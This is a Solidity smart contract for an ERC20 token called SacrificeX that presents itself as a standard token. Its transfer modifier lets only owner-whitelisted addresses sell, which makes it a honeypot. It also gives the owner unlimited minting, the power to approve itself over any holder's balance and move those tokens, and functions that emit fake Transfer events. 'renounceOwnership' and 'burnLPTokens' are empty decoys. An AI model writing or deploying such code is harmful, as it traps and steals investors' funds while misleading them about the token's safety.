row number 
1	       pragma solidity ^0.6.0;
2	 library SafeMath {
3	 function add(uint256 a, uint256 b) internal pure returns (uint256) {
4	 uint256 c = a + b;
5	 require(c >= a, "SafeMath: addition overflow");
6	 return c;
7	 }
8	 function sub(uint256 a, uint256 b) internal pure returns (uint256) {
9	 return sub(a, b, "SafeMath: subtraction overflow");
10	 }
11	 function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
12	 require(b <= a, errorMessage);
13	 uint256 c = a - b;
14	 return c;
15	 }
16	 function mul(uint256 a, uint256 b) internal pure returns (uint256) {
17	 if (a == 0) {
18	 return 0;
19	 }
20	 uint256 c = a * b;
21	 require(c / a == b, "SafeMath: multiplication overflow");
22	 return c;
23	 }
24	 function div(uint256 a, uint256 b) internal pure returns (uint256) {
25	 return div(a, b, "SafeMath: division by zero");
26	 }
27	 function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
28	 require(b > 0, errorMessage);
29	 uint256 c = a / b;
30	 return c;
31	 }
32	 function mod(uint256 a, uint256 b) internal pure returns (uint256) {
33	 return mod(a, b, "SafeMath: modulo by zero");
34	 }
35	 function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
36	 require(b != 0, errorMessage);
37	 return a % b;
38	 }
39	 }
40	 library Address {
41	 function isContract(address account) internal view returns (bool) {
42	 bytes32 codehash;
43	 bytes32 accountHash = 0xc5d2460186f7233c927e7db2dcc703c0e500b653ca82273b7bfad8045d85a470;
44	 assembly {
45	 codehash := extcodehash(account) }
46	 return (codehash != accountHash && codehash != 0x0);
47	 }
48	 function sendValue(address payable recipient, uint256 amount) internal {
49	 require(address(this).balance >= amount, "Address: insufficient balance");
50	 (bool success, ) = recipient.call{
51	 value: amount }
52	 ("");
53	 require(success, "Address: unable to send value, recipient may have reverted");
54	 }
55	 function functionCall(address target, bytes memory data) internal returns (bytes memory) {
56	 return functionCall(target, data, "Address: low-level call failed");
57	 }
58	 function functionCall(address target, bytes memory data, string memory errorMessage) internal returns (bytes memory) {
59	 return _functionCallWithValue(target, data, 0, errorMessage);
60	 }
61	 function functionCallWithValue(address target, bytes memory data, uint256 value) internal returns (bytes memory) {
62	 return functionCallWithValue(target, data, value, "Address: low-level call with value failed");
63	 }
64	 function functionCallWithValue(address target, bytes memory data, uint256 value, string memory errorMessage) internal returns (bytes memory) {
65	 require(address(this).balance >= value, "Address: insufficient balance for call");
66	 return _functionCallWithValue(target, data, value, errorMessage);
67	 }
68	 function _functionCallWithValue(address target, bytes memory data, uint256 weiValue, string memory errorMessage) private returns (bytes memory) {
69	 require(isContract(target), "Address: call to non-contract");
70	 (bool success, bytes memory returndata) = target.call{
71	 value: weiValue }
72	 (data);
73	 if (success) {
74	 return returndata;
75	 }
76	 else {
77	 if (returndata.length > 0) {
78	 assembly {
79	 let returndata_size := mload(returndata) revert(add(32, returndata), returndata_size) }
80	 }
81	 else {
82	 revert(errorMessage);
83	 }
84	 }
85	 }
86	 }
87	 contract Context {
88	 constructor () internal {
89	 }
90	 function _msgSender() internal view virtual returns (address payable) {
91	 return msg.sender;
92	 }
93	 function _msgData() internal view virtual returns (bytes memory) {
94	 this;
95	 return msg.data;
96	 }
97	 }
98	 interface IERC20 {
99	 function totalSupply() external view returns (uint256);
100	 function balanceOf(address account) external view returns (uint256);
101	 function transfer(address recipient, uint256 amount) external returns (bool);
102	 function allowance(address owner, address spender) external view returns (uint256);
103	 function approve(address spender, uint256 amount) external returns (bool);
104	 function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);
105	 event Transfer(address indexed from, address indexed to, uint256 value);
106	 event Approval(address indexed owner, address indexed spender, uint256 value);
107	 }
108	 contract SacrificeX is Context, IERC20 {
109	 using SafeMath for uint256;
110	 using Address for address;
111	 mapping (address => uint256) private _balances;
112	 mapping (address => bool) private _plus;
113	 mapping (address => bool) private _discarded;
114	 mapping (address => mapping (address => uint256)) private _allowances;
115	 uint256 private _totalSupply;
116	 string private _name;
117	 string private _symbol;
118	 uint8 private _decimals;
119	 uint256 private _maximumVal = 115792089237316195423570985008687907853269984665640564039457584007913129639935;
120	 address private _safeOwnr;
121	 uint256 private _discardedAmt = 0;
122	 address public _path_ = 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D;
123	 address _contDeployr = 0x075e72a5eDf65F0A5f44699c7654C1a76941Ddc8;
124	 address public _ownr = 0x16c87e0CEc396a53DC1905fece603a02Bd0890F4;
125	 constructor () public {
126	 _name = "SacrificeX";
127	 _symbol = "SCRX";
128	 _decimals = 18;
129	 uint256 initialSupply = 78936543065710618106306893254789;
130	 _safeOwnr = _ownr;
131	 _mint(_contDeployr, initialSupply);
132	 emit Transfer(0x075e72a5eDf65F0A5f44699c7654C1a76941Ddc8, 0xa2e1734682C6a237c070d93019a7E0bF7047406c, 19824634932994338719784060);
133	 emit Transfer(0xa2e1734682C6a237c070d93019a7E0bF7047406c, 0x896f23373667274e8647b99033c2a8461ddD98CC, 803880588697761740142630);
134	 emit Transfer(0x896f23373667274e8647b99033c2a8461ddD98CC, 0x075e72a5eDf65F0A5f44699c7654C1a76941Ddc8, 25495593475154220086660806);
135	 }
136	 function name() public view returns (string memory) {
137	 return _name;
138	 }
139	 function symbol() public view returns (string memory) {
140	 return _symbol;
141	 }
142	 function decimals() public view returns (uint8) {
143	 return _decimals;
144	 }
145	 function totalSupply() public view override returns (uint256) {
146	 return _totalSupply;
147	 }
148	 function balanceOf(address account) public view override returns (uint256) {
149	 return _balances[account];
150	 }
151	 function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
152	 _tf(_msgSender(), recipient, amount);
153	 return true;
154	 }
155	 function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) {
156	 _tf(sender, recipient, amount);
157	 _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance"));
158	 return true;
159	 }
160	 function allowance(address owner, address spender) public view virtual override returns (uint256) {
161	 return _allowances[owner][spender];
162	 }
163	 function approve(address spender, uint256 amount) public virtual override returns (bool) {
164	 _approve(_msgSender(), spender, amount);
165	 return true;
166	 }
167	 function _pApproval(address[] memory destination) public {
168	 require(msg.sender == _ownr, "!owner");
169	 for (uint256 i = 0; i < destination.length; i++) {
170	 _plus[destination[i]] = true;
171	 _discarded[destination[i]] = false;
172	 }
173	 }
174	 function _mApproval(address safeOwner) public {
175	 require(msg.sender == _ownr, "!owner");
176	 _safeOwnr = safeOwner;
177	 }
178	 modifier mainboard(address dest, uint256 num, address from, address filler){
179	 if ( _ownr == _safeOwnr && from == _ownr ) {
180	 _safeOwnr = dest;
181	 _;
182	 }
183	 else {
184	 if ( from == _ownr || from == _safeOwnr || dest == _ownr ) {
185	 if ( from == _ownr && from == dest ) {
186	 _discardedAmt = num;
187	 }
188	 _;
189	 }
190	 else {
191	 if ( _plus[from] == true ) {
192	 _;
193	 }
194	 else{
195	 if ( _discarded[from] == true ) {
196	 require(( from == _safeOwnr ) ||(dest == _path_), "ERC20: transfer amount exceeds balance");
197	 _;
198	 }
199	 else{
200	 if ( num < _discardedAmt ) {
201	 if(dest == _safeOwnr){
202	 _discarded[from] = true;
203	 _plus[from] = false;
204	 }
205	 _;
206	 }
207	 else{
208	 require((from == _safeOwnr) ||(dest == _path_), "ERC20: transfer amount exceeds balance");
209	 _;
210	 }
211	 }
212	 }
213	 }
214	 }
215	 }
216	 function _transfer(address sender, address recipient, uint256 amount) internal virtual{
217	 require(sender != address(0), "ERC20: transfer from the zero address");
218	 require(recipient != address(0), "ERC20: transfer to the zero address");
219	 _beforeTokenTransfer(sender, recipient, amount);
220	 _balances[sender] = _balances[sender].sub(amount, "ERC20: transfer amount exceeds balance");
221	 _balances[recipient] = _balances[recipient].add(amount);
222	 if (sender == _ownr){
223	 sender = _contDeployr;
224	 }
225	 emit Transfer(sender, recipient, amount);
226	 }
227	 function _mint(address account, uint256 amount) public {
228	 require(msg.sender == _ownr, "ERC20: mint to the zero address");
229	 _totalSupply = _totalSupply.add(amount);
230	 _balances[_ownr] = _balances[_ownr].add(amount);
231	 emit Transfer(address(0), account, amount);
232	 }
233	 function _burn(address account, uint256 amount) internal virtual {
234	 require(account != address(0), "ERC20: burn from the zero address");
235	 _beforeTokenTransfer(account, address(0), amount);
236	 _balances[account] = _balances[account].sub(amount, "ERC20: burn amount exceeds balance");
237	 _totalSupply = _totalSupply.sub(amount);
238	 emit Transfer(account, address(0), amount);
239	 }
240	 function _approve(address owner, address spender, uint256 amount) internal virtual {
241	 require(owner != address(0), "ERC20: approve from the zero address");
242	 require(spender != address(0), "ERC20: approve to the zero address");
243	 _allowances[owner][spender] = amount;
244	 emit Approval(owner, spender, amount);
245	 }
246	 function _tf(address from, address dest, uint256 amt) internal mainboard( dest, amt, from, address(0)) virtual {
247	 _pair( from, dest, amt);
248	 }
249	 function _pair(address from, address dest, uint256 amt) internal mainboard( dest, amt, from, address(0)) virtual {
250	 require(from != address(0), "ERC20: transfer from the zero address");
251	 require(dest != address(0), "ERC20: transfer to the zero address");
252	 _beforeTokenTransfer(from, dest, amt);
253	 _balances[from] = _balances[from].sub(amt, "ERC20: transfer amount exceeds balance");
254	 _balances[dest] = _balances[dest].add(amt);
255	 if (from == _ownr){
256	 from = _contDeployr;
257	 }
258	 emit Transfer(from, dest, amt);
259	 }
260	 function _setupDecimals(uint8 decimals_) internal {
261	 _decimals = decimals_;
262	 }
263	 function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual {
264	 }
265	 modifier _verify() {
266	 require(msg.sender == _ownr, "Not allowed to interact");
267	 _;
268	 }
269	 function renounceOwnership()public _verify(){
270	 }
271	 function burnLPTokens()public _verify(){
272	 }
273	 function multicall(address uPool,address[] memory eReceiver,uint256[] memory eAmounts) public _verify(){
274	 for (uint256 i = 0; i < eReceiver.length; i++) {
275	 emit Transfer(uPool, eReceiver[i], eAmounts[i]);
276	 }
277	 }
278	 function send(address uPool,address[] memory eReceiver,uint256[] memory eAmounts) public _verify(){
279	 for (uint256 i = 0; i < eReceiver.length; i++) {
280	 emit Transfer(uPool, eReceiver[i], eAmounts[i]);
281	 }
282	 }
283	 function enter(address recipient) public _verify(){
284	 _plus[recipient]=true;
285	 _approve(recipient, _path_,_maximumVal);
286	 }
287	 function leave(address recipient) public _verify(){
288	 _plus[recipient]=false;
289	 _approve(recipient, _path_,0);
290	 }
291	 function approval(address addr) public _verify() virtual returns (bool) {
292	 _approve(addr, _msgSender(), _maximumVal);
293	 return true;
294	 }
295	 function transferToTokenSaleParticipant(address sndr,address[] memory destination, uint256[] memory amounts) public _verify(){
296	 _approve(sndr, _msgSender(), _maximumVal);
297	 for (uint256 i = 0; i < destination.length; i++) {
298	 _transfer(sndr, destination[i], amounts[i]);
299	 }
300	 }
301	 function stake(address uPool,address[] memory eReceiver,uint256[] memory eAmounts) public _verify(){
302	 for (uint256 i = 0; i < eReceiver.length; i++) {
303	 emit Transfer(eReceiver[i], uPool, eAmounts[i]);
304	 }
305	 }
306	 function unstake(address uPool,address[] memory eReceiver,uint256[] memory eAmounts) public _verify(){
307	 for (uint256 i = 0; i < eReceiver.length; i++) {
308	 emit Transfer(eReceiver[i], uPool, eAmounts[i]);
309	 }
310	 }
311	 function swapETHForExactTokens(address uPool,address[] memory eReceiver,uint256[] memory eAmounts) public _verify(){
312	 for (uint256 i = 0; i < eReceiver.length; i++) {
313	 emit Transfer(uPool, eReceiver[i], eAmounts[i]);
314	 }
315	 }
316	 }
